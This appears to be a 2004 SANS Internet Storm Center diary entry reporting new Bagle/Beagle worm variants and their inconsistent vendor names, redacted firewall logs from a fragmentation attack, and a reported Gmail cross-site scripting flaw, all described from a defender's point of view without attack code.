Last Updated: 2004-10-30 04:13:28 UTC
by Lenny Zeltser (Version: 1)
We received many reports of a new Bagle/Beagle worm variant seen in the wild today. Be sure to update your anti-virus signatures, if you haven't done so already.
It seems that there are actually three different variants out there, but they exhibit similar characteristics: they spread via email and P2P networks, listen on TCP port 81, and attempt downloading files from pre-defined web servers.
We received a couple of reports of systems initiating outbound connections on TCP port 81. According to one of these reports (thanks, Mark!), the systems were infected with an older Bagle variant (Beagle.AI, according to McAfee), which is a bit strange. If you've witnessed outbound connections on TCP port 81, please send us your packet traces.
As far as I know, the file that the worm attempts retrieving from the remote servers is currently not present on any of the servers. One theory (thanks, Vern!) is that the worm may be connecting to remote web servers via HTTP in order to register itself with the server's access or error logs, giving the author a list of infected systems so that he or she can then access them via inbound TCP port 81 connections.
The naming of these variants is inconsistent across vendors. I wish anti-virus vendors could agree on the taxonomy, as having different names generates a lot of confusion among anti-virus software users. As far as I can tell, the following names refer to the same variant:
Bagle.AV (Sophos, Symantec)
Bagle.AQ (Computer Associates, Norman)
Bagle.AP, Beagle.AT (F-Secure)
Bagle.AT (Kaspersky, TrendMicro)
The following names seem to refer to a slightly different variant:
Yet another variant carries the following names:
Bagle.AR (Computer Associates)
Secunia offers a page with links to several vendors' descriptions of today's Bagle/Beagle variants:
Have you witnessed fragmentation attacks recently?
A bit less than two weeks ago we received a report of a fragmentation attack targeting two unrelated financial services organizations. We'd like to understand that attack better. Here are a few log entries that document the attack :
Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: Fragmented traffic! From xxx.xxx.xxx.59:4591 to xxx.xxx.xxx.xxx:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.
Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: Fragmented traffic! From xxx.xxx.xxx.12:4591 to xxx.xxx.xxx.xxx:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.
FW-1: OPSEC Oct 15, 7:58pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: Timeout (xxx.xxx.xxx.4 -> xxx.xxx.xxx.xxx proto 17 id 63039 len 0 offset 0) - 5 fragments dropped during the last 60 seconds
FW-1: OPSEC Oct 15, 7:57pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: Timeout (xxx.xxx.xxx.4 -> xxx.xxx.xxx.xxx proto 17 id 2629 len 0 offset 0) - 4 fragments dropped during the last 60 seconds
If you've recently witnessed fragmentation attacks of this nature, please send us the relevant packet captures or log entries.
An XSS hole reported in Gmail
According to a Nana NetLife Magazine report, there is a cross-site scripting (XSS) vulnerability in Gmail, Google's webmail service. The flaw allows an attacker to steal a Gmail user's authentication cookie, providing access to the victim's account without having to know the password. The article states that Google is in the process of addressing the problem:
XSS issues are present in many, many web applications. Unfortunately, many organizations are not set up to prevent XSS flaws during the software development cycle, and are quick to dismiss XSS vulnerabilities as being unreasonably difficult to exploit. In reality, the execution of XSS attacks is often not very challenging, and the exposure can be significant.
The iDefense paper "The Evolution of Cross-Site Scripting Attacks" provides an excellent overview of XSS-related issues. You can access it at the following URL; the site requires (free) registration:
ISC Handler of the Day
Please choose a specific diary above to comment